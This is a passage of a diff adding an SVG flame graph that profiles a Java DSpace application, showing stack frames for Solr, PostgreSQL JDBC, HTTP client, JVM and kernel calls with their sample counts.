+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (4 samples, 0.91%)</title><rect x="685.8" y="437" width="10.7" height="15.0" fill="rgb(81,229,81)" rx="2" ry="2" />
+<text  x="688.82" y="447.5" ></text>
+</g>
+<g >
+<title>java/util/concurrent/ConcurrentHashMap:::transfer (1 samples, 0.23%)</title><rect x="1104.2" y="341" width="2.7" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="1107.18" y="351.5" ></text>
+</g>
+<g >
+<title>futex_wait (48 samples, 10.91%)</title><rect x="353.3" y="725" width="128.7" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="356.27" y="735.5" >futex_wait</text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::write (1 samples, 0.23%)</title><rect x="1155.1" y="405" width="2.7" height="15.0" fill="rgb(52,201,52)" rx="2" ry="2" />
+<text  x="1158.14" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (1 samples, 0.23%)</title><rect x="1047.9" y="453" width="2.6" height="15.0" fill="rgb(71,219,71)" rx="2" ry="2" />
+<text  x="1050.86" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readVal (1 samples, 0.23%)</title><rect x="1106.9" y="389" width="2.6" height="15.0" fill="rgb(71,219,71)" rx="2" ry="2" />
+<text  x="1109.86" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.68%)</title><rect x="1066.6" y="437" width="8.1" height="15.0" fill="rgb(91,238,91)" rx="2" ry="2" />
+<text  x="1069.64" y="447.5" ></text>
+</g>
+<g >
+<title>C2_CompilerThre (48 samples, 10.91%)</title><rect x="63.6" y="821" width="128.8" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="66.64" y="831.5" >C2_CompilerThre</text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (9 samples, 2.05%)</title><rect x="1082.7" y="389" width="24.2" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="1085.73" y="399.5" >o..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (1 samples, 0.23%)</title><rect x="943.3" y="389" width="2.7" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="946.27" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="277" width="2.7" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="176.59" y="287.5" ></text>
+</g>
+<g >
+<title>schedule (48 samples, 10.91%)</title><rect x="353.3" y="693" width="128.7" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="356.27" y="703.5" >schedule</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="1055.9" y="421" width="2.7" height="15.0" fill="rgb(77,225,77)" rx="2" ry="2" />
+<text  x="1058.91" y="431.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (1 samples, 0.23%)</title><rect x="1055.9" y="357" width="2.7" height="15.0" fill="rgb(92,238,92)" rx="2" ry="2" />
+<text  x="1058.91" y="367.5" ></text>
+</g>
+<g >
+<title>__x64_sys_poll (1 samples, 0.23%)</title><rect x="1101.5" y="261" width="2.7" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="1104.50" y="271.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.23%)</title><rect x="956.7" y="357" width="2.7" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="959.68" y="367.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/PluginManager:::getNamedPlugin (3 samples, 0.68%)</title><rect x="895.0" y="421" width="8.0" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="898.00" y="431.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractBeanFactory:::doGetBean (1 samples, 0.23%)</title><rect x="967.4" y="437" width="2.7" height="15.0" fill="rgb(76,224,76)" rx="2" ry="2" />
+<text  x="970.41" y="447.5" ></text>
+</g>
+<g >
+<title>__dev_queue_xmit (2 samples, 0.45%)</title><rect x="586.6" y="581" width="5.4" height="15.0" fill="rgb(200,51,51)" rx="2" ry="2" />
+<text  x="589.59" y="591.5" ></text>
+</g>
+<g >
+<title>native_write_msr (24 samples, 5.45%)</title><rect x="63.6" y="613" width="64.4" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="66.64" y="623.5" >native_..</text>
+</g>
+<g >
+<title>skb_copy_datagram_iter (1 samples, 0.23%)</title><rect x="538.3" y="693" width="2.7" height="15.0" fill="rgb(219,78,78)" rx="2" ry="2" />
+<text  x="541.32" y="703.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::get (1 samples, 0.23%)</title><rect x="900.4" y="405" width="2.6" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="903.36" y="415.5" ></text>
+</g>
+<g >
+<title>[unknown] (17 samples, 3.86%)</title><rect x="299.6" y="805" width="45.6" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="302.64" y="815.5" >[unk..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1098.8" y="261" width="2.7" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="1101.82" y="271.5" ></text>
+</g>
+<g >
+<title>__pthread_getspecific (1 samples, 0.23%)</title><rect x="187.0" y="629" width="2.7" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="190.00" y="639.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::getStackTraceElement (1 samples, 0.23%)</title><rect x="683.1" y="293" width="2.7" height="15.0" fill="rgb(67,216,67)" rx="2" ry="2" />
+<text  x="686.14" y="303.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match0 (2 samples, 0.45%)</title><rect x="978.1" y="261" width="5.4" height="15.0" fill="rgb(76,224,76)" rx="2" ry="2" />
+<text  x="981.14" y="271.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match0 (2 samples, 0.45%)</title><rect x="978.1" y="181" width="5.4" height="15.0" fill="rgb(58,207,58)" rx="2" ry="2" />
+<text  x="981.14" y="191.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.45%)</title><rect x="937.9" y="405" width="5.4" height="15.0" fill="rgb(66,214,66)" rx="2" ry="2" />
+<text  x="940.91" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/Context:::&lt;init&gt; (2 samples, 0.45%)</title><rect x="1168.5" y="485" width="5.4" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="1171.55" y="495.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (18 samples, 4.09%)</title><rect x="246.0" y="773" width="48.3" height="15.0" fill="rgb(253,128,128)" rx="2" ry="2" />
+<text  x="249.00" y="783.5" >entr..</text>
+</g>
+<g >
+<title>org/springframework/core/convert/support/DefaultConversionService:::addFallbackConverters (1 samples, 0.23%)</title><rect x="849.4" y="373" width="2.7" height="15.0" fill="rgb(68,216,68)" rx="2" ry="2" />
+<text  x="852.41" y="383.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (45 samples, 10.23%)</title><rect x="543.7" y="773" width="120.7" height="15.0" fill="rgb(247,118,118)" rx="2" ry="2" />
+<text  x="546.68" y="783.5" >do_syscall_64</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="1141.7" y="277" width="5.4" height="15.0" fill="rgb(226,88,88)" rx="2" ry="2" />
+<text  x="1144.73" y="287.5" ></text>
+</g>
+<g >
+<title>newidle_balance (1 samples, 0.23%)</title><rect x="128.0" y="645" width="2.7" height="15.0" fill="rgb(240,109,109)" rx="2" ry="2" />
+<text  x="131.00" y="655.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::split (1 samples, 0.23%)</title><rect x="801.1" y="453" width="2.7" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="804.14" y="463.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SearchUtils:::getAllDiscoveryConfigurations (3 samples, 0.68%)</title><rect x="956.7" y="453" width="8.0" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="959.68" y="463.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.23%)</title><rect x="798.5" y="325" width="2.6" height="15.0" fill="rgb(89,236,89)" rx="2" ry="2" />
+<text  x="801.45" y="335.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::next (1 samples, 0.23%)</title><rect x="1165.9" y="469" width="2.6" height="15.0" fill="rgb(77,225,77)" rx="2" ry="2" />
+<text  x="1168.86" y="479.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (6 samples, 1.36%)</title><rect x="1173.9" y="789" width="16.1" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="1176.91" y="799.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="297.0" y="725" width="2.6" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="299.95" y="735.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1171.2" y="213" width="2.7" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="1174.23" y="223.5" ></text>
+</g>
+<g >
+<title>process_backlog (16 samples, 3.64%)</title><rect x="600.0" y="501" width="42.9" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="603.00" y="511.5" >proc..</text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (2 samples, 0.45%)</title><rect x="1077.4" y="437" width="5.3" height="15.0" fill="rgb(54,203,54)" rx="2" ry="2" />
+<text  x="1080.36" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (2 samples, 0.45%)</title><rect x="1160.5" y="453" width="5.4" height="15.0" fill="rgb(90,236,90)" rx="2" ry="2" />
+<text  x="1163.50" y="463.5" ></text>
+</g>
+<g >
+<title>timerqueue_add (1 samples, 0.23%)</title><rect x="10.0" y="661" width="2.7" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="13.00" y="671.5" ></text>
+</g>
+<g >
+<title>sun/reflect/Reflection:::getCallerClass (1 samples, 0.23%)</title><rect x="844.0" y="261" width="2.7" height="15.0" fill="rgb(75,223,75)" rx="2" ry="2" />
+<text  x="847.05" y="271.5" ></text>
+</g>
+<g >
+<title>blk_update_request (1 samples, 0.23%)</title><rect x="484.7" y="565" width="2.7" height="15.0" fill="rgb(204,56,56)" rx="2" ry="2" />
+<text  x="487.68" y="575.5" ></text>
+</g>
+<g >
+<title>futex_wait (8 samples, 1.82%)</title><rect x="195.0" y="725" width="21.5" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="198.05" y="735.5" >f..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (15 samples, 3.41%)</title><rect x="755.5" y="421" width="40.3" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="758.55" y="431.5" >org..</text>
+</g>
+<g >
+<title>java/util/concurrent/ConcurrentHashMap:::putVal (1 samples, 0.23%)</title><rect x="1104.2" y="357" width="2.7" height="15.0" fill="rgb(90,236,90)" rx="2" ry="2" />
+<text  x="1107.18" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractSessionOutputBuffer:::flushBuffer (1 samples, 0.23%)</title><rect x="777.0" y="277" width="2.7" height="15.0" fill="rgb(77,225,77)" rx="2" ry="2" />
+<text  x="780.00" y="287.5" ></text>
+</g>
+<g >
+<title>update_load_avg.constprop.0 (1 samples, 0.23%)</title><rect x="490.0" y="581" width="2.7" height="15.0" fill="rgb(219,77,77)" rx="2" ry="2" />
+<text  x="493.05" y="591.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.23%)</title><rect x="1047.9" y="421" width="2.6" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="1050.86" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (4 samples, 0.91%)</title><rect x="685.8" y="421" width="10.7" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="688.82" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="243.3" y="581" width="2.7" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="246.32" y="591.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (2 samples, 0.45%)</title><rect x="782.4" y="341" width="5.3" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="785.36" y="351.5" ></text>
+</g>
+<g >
+<title>_raw_spin_unlock (1 samples, 0.23%)</title><rect x="535.6" y="581" width="2.7" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="538.64" y="591.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (5 samples, 1.14%)</title><rect x="629.5" y="453" width="13.4" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="632.50" y="463.5" ></text>
+</g>
+<g >
+<title>update_cfs_group (1 samples, 0.23%)</title><rect x="610.7" y="261" width="2.7" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="613.73" y="271.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/DefaultConnectionReuseStrategy:::keepAlive (1 samples, 0.23%)</title><rect x="1125.6" y="389" width="2.7" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="1128.64" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="838.7" y="309" width="2.7" height="15.0" fill="rgb(201,51,51)" rx="2" ry="2" />
+<text  x="841.68" y="319.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (3 samples, 0.68%)</title><rect x="1141.7" y="357" width="8.1" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="1144.73" y="367.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (6 samples, 1.36%)</title><rect x="916.5" y="421" width="16.0" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="919.45" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1098.8" y="245" width="2.7" height="15.0" fill="rgb(207,60,60)" rx="2" ry="2" />
+<text  x="1101.82" y="255.5" ></text>
+</g>
+<g >
+<title>java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.23%)</title><rect x="951.3" y="309" width="2.7" height="15.0" fill="rgb(67,216,67)" rx="2" ry="2" />
+<text  x="954.32" y="319.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::receiveFields (1 samples, 0.23%)</title><rect x="1171.2" y="357" width="2.7" height="15.0" fill="rgb(104,249,104)" rx="2" ry="2" />
+<text  x="1174.23" y="367.5" ></text>
+</g>
+<g >
+<title>dequeue_entity (1 samples, 0.23%)</title><rect x="12.7" y="645" width="2.7" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="15.68" y="655.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (2 samples, 0.45%)</title><rect x="948.6" y="357" width="5.4" height="15.0" fill="rgb(70,218,70)" rx="2" ry="2" />
+<text  x="951.64" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/HttpStrictMultipart:::formatMultipartHeader (1 samples, 0.23%)</title><rect x="688.5" y="325" width="2.7" height="15.0" fill="rgb(61,210,61)" rx="2" ry="2" />
+<text  x="691.50" y="335.5" ></text>
+</g>
+<g >
+<title>tcp_push (1 samples, 0.23%)</title><rect x="661.7" y="677" width="2.7" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="664.68" y="687.5" ></text>
+</g>
+<g >
+<title>__update_load_avg_se (1 samples, 0.23%)</title><rect x="12.7" y="613" width="2.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="15.68" y="623.5" ></text>
+</g>
+<g >
+<title>__tcp_transmit_skb (28 samples, 6.36%)</title><rect x="573.2" y="645" width="75.1" height="15.0" fill="rgb(229,93,93)" rx="2" ry="2" />
+<text  x="576.18" y="655.5" >__tcp_tr..</text>
+</g>
+<g >
+<title>netif_rx (1 samples, 0.23%)</title><rect x="589.3" y="533" width="2.7" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="592.27" y="543.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (19 samples, 4.32%)</title><rect x="141.4" y="757" width="51.0" height="15.0" fill="rgb(209,64,64)" rx="2" ry="2" />
+<text  x="144.41" y="767.5" >[libj..</text>
+</g>
+<g >
+<title>org/apache/solr/common/util/XML:::escape (1 samples, 0.23%)</title><rect x="744.8" y="341" width="2.7" height="15.0" fill="rgb(104,249,104)" rx="2" ry="2" />
+<text  x="747.82" y="351.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="240.6" y="789" width="5.4" height="15.0" fill="rgb(254,129,129)" rx="2" ry="2" />
+<text  x="243.64" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::handleResponse (1 samples, 0.23%)</title><rect x="766.3" y="373" width="2.7" height="15.0" fill="rgb(56,206,56)" rx="2" ry="2" />
+<text  x="769.27" y="383.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.23%)</title><rect x="937.9" y="309" width="2.7" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="940.91" y="319.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="213" width="2.7" height="15.0" fill="rgb(250,122,122)" rx="2" ry="2" />
+<text  x="176.59" y="223.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="838.7" y="293" width="2.7" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="841.68" y="303.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.23%)</title><rect x="905.7" y="405" width="2.7" height="15.0" fill="rgb(91,238,91)" rx="2" ry="2" />
+<text  x="908.73" y="415.5" ></text>
+</g>
+<g >
+<title>java/net/AbstractPlainSocketImpl:::setOption (1 samples, 0.23%)</title><rect x="1139.0" y="373" width="2.7" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="1142.05" y="383.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject$MetadataCache:::get (6 samples, 1.36%)</title><rect x="916.5" y="437" width="16.0" height="15.0" fill="rgb(101,247,101)" rx="2" ry="2" />
+<text  x="919.45" y="447.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.23%)</title><rect x="1168.5" y="341" width="2.7" height="15.0" fill="rgb(71,219,71)" rx="2" ry="2" />
+<text  x="1171.55" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doReceiveResponse (2 samples, 0.45%)</title><rect x="1131.0" y="373" width="5.4" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="1134.00" y="383.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group:::find (1 samples, 0.23%)</title><rect x="943.3" y="421" width="2.7" height="15.0" fill="rgb(65,214,65)" rx="2" ry="2" />
+<text  x="946.27" y="431.5" ></text>
+</g>
+<g >
+<title>__lll_lock_wait (4 samples, 0.91%)</title><rect x="299.6" y="789" width="10.8" height="15.0" fill="rgb(214,70,70)" rx="2" ry="2" />
+<text  x="302.64" y="799.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::getIntColumn (1 samples, 0.23%)</title><rect x="959.4" y="421" width="2.6" height="15.0" fill="rgb(99,245,99)" rx="2" ry="2" />
+<text  x="962.36" y="431.5" ></text>
+</g>
+<g >
+<title>Interpreter (189 samples, 42.95%)</title><rect x="667.0" y="501" width="506.9" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="670.05" y="511.5" >Interpreter</text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (24 samples, 5.45%)</title><rect x="63.6" y="645" width="64.4" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="66.64" y="655.5" >__perf_..</text>
+</g>
+<g >
+<title>call_stub (189 samples, 42.95%)</title><rect x="667.0" y="725" width="506.9" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="670.05" y="735.5" >call_stub</text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.23%)</title><rect x="1128.3" y="373" width="2.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1131.32" y="383.5" ></text>
+</g>
+<g >
+<title>tcp_sendmsg_locked (37 samples, 8.41%)</title><rect x="565.1" y="693" width="99.3" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="568.14" y="703.5" >tcp_sendmsg_..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="844.0" y="245" width="2.7" height="15.0" fill="rgb(246,116,116)" rx="2" ry="2" />
+<text  x="847.05" y="255.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.45%)</title><rect x="937.9" y="421" width="5.4" height="15.0" fill="rgb(99,245,99)" rx="2" ry="2" />
+<text  x="940.91" y="431.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (2 samples, 0.45%)</title><rect x="948.6" y="437" width="5.4" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="951.64" y="447.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (3 samples, 0.68%)</title><rect x="1066.6" y="341" width="8.1" height="15.0" fill="rgb(100,246,100)" rx="2" ry="2" />
+<text  x="1069.64" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (3 samples, 0.68%)</title><rect x="1152.5" y="453" width="8.0" height="15.0" fill="rgb(108,254,108)" rx="2" ry="2" />
+<text  x="1155.45" y="463.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::requiresIndexing (10 samples, 2.27%)</title><rect x="1082.7" y="469" width="26.8" height="15.0" fill="rgb(102,247,102)" rx="2" ry="2" />
+<text  x="1085.73" y="479.5" >o..</text>
+</g>
+<g >
+<title>sun/nio/cs/UTF_8$Encoder:::encode (3 samples, 0.68%)</title><rect x="672.4" y="389" width="8.1" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="675.41" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/AbstractUpdateRequest:::process (37 samples, 8.41%)</title><rect x="696.5" y="437" width="99.3" height="15.0" fill="rgb(68,217,68)" rx="2" ry="2" />
+<text  x="699.55" y="447.5" >org/apache/s..</text>
+</g>
+<g >
+<title>__perf_event_task_sched_out (1 samples, 0.23%)</title><rect x="487.4" y="613" width="2.6" height="15.0" fill="rgb(248,119,119)" rx="2" ry="2" />
+<text  x="490.36" y="623.5" ></text>
+</g>
+<g >
+<title>[unknown] (19 samples, 4.32%)</title><rect x="10.0" y="805" width="51.0" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="13.00" y="815.5" >[unkn..</text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (12 samples, 2.73%)</title><rect x="310.4" y="645" width="32.1" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="313.36" y="655.5" >__..</text>
+</g>
+<g >
+<title>__futex_wait_setup (1 samples, 0.23%)</title><rect x="192.4" y="709" width="2.6" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="195.36" y="719.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (13 samples, 2.95%)</title><rect x="310.4" y="741" width="34.8" height="15.0" fill="rgb(217,75,75)" rx="2" ry="2" />
+<text  x="313.36" y="751.5" >__..</text>
+</g>
+<g >
+<title>mprotect_fixup (1 samples, 0.23%)</title><rect x="347.9" y="629" width="2.7" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="350.91" y="639.5" ></text>
+</g>
+<g >
+<title>JVM_DoPrivileged (1 samples, 0.23%)</title><rect x="1120.3" y="389" width="2.7" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="1123.27" y="399.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (2 samples, 0.45%)</title><rect x="937.9" y="357" width="5.4" height="15.0" fill="rgb(86,233,86)" rx="2" ry="2" />
+<text  x="940.91" y="367.5" ></text>
+</g>
+<g >
+<title>java/net/PlainSocketImpl:::socketSetOption0 (1 samples, 0.23%)</title><rect x="1139.0" y="357" width="2.7" height="15.0" fill="rgb(62,211,62)" rx="2" ry="2" />
+<text  x="1142.05" y="367.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (16 samples, 3.64%)</title><rect x="492.7" y="581" width="42.9" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="495.73" y="591.5" >__in..</text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::subAppend (2 samples, 0.45%)</title><rect x="680.5" y="341" width="5.3" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="683.45" y="351.5" ></text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.23%)</title><rect x="1090.8" y="325" width="2.7" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="1093.77" y="335.5" ></text>
+</g>
+<g >
+<title>start_thread (1 samples, 0.23%)</title><rect x="216.5" y="805" width="2.7" height="15.0" fill="rgb(205,57,57)" rx="2" ry="2" />
+<text  x="219.50" y="815.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::next (1 samples, 0.23%)</title><rect x="1074.7" y="453" width="2.7" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="1077.68" y="463.5" ></text>
+</g>
+<g >
+<title>__ip_queue_xmit (27 samples, 6.14%)</title><rect x="573.2" y="629" width="72.4" height="15.0" fill="rgb(239,106,106)" rx="2" ry="2" />
+<text  x="576.18" y="639.5" >__ip_que..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (3 samples, 0.68%)</title><rect x="1066.6" y="357" width="8.1" height="15.0" fill="rgb(65,213,65)" rx="2" ry="2" />
+<text  x="1069.64" y="367.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="170.9" y="533" width="5.4" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="173.91" y="543.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.23%)</title><rect x="943.3" y="341" width="2.7" height="15.0" fill="rgb(66,214,66)" rx="2" ry="2" />
+<text  x="946.27" y="351.5" ></text>
+</g>
+<g >
+<title>try_to_wake_up (1 samples, 0.23%)</title><rect x="484.7" y="517" width="2.7" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="487.68" y="527.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (1 samples, 0.23%)</title><rect x="964.7" y="437" width="2.7" height="15.0" fill="rgb(63,212,63)" rx="2" ry="2" />
+<text  x="967.73" y="447.5" ></text>
+</g>
+<g >
+<title>C1_CompilerThre (20 samples, 4.55%)</title><rect x="10.0" y="821" width="53.6" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="13.00" y="831.5" >C1_Co..</text>
+</g>
+<g >
+<title>jlong_disjoint_arraycopy (1 samples, 0.23%)</title><rect x="857.5" y="341" width="2.6" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="860.45" y="351.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="216.5" y="741" width="2.7" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="219.50" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readSolrDocument (1 samples, 0.23%)</title><rect x="1106.9" y="309" width="2.6" height="15.0" fill="rgb(55,204,55)" rx="2" ry="2" />
+<text  x="1109.86" y="319.5" ></text>
+</g>
+<g >
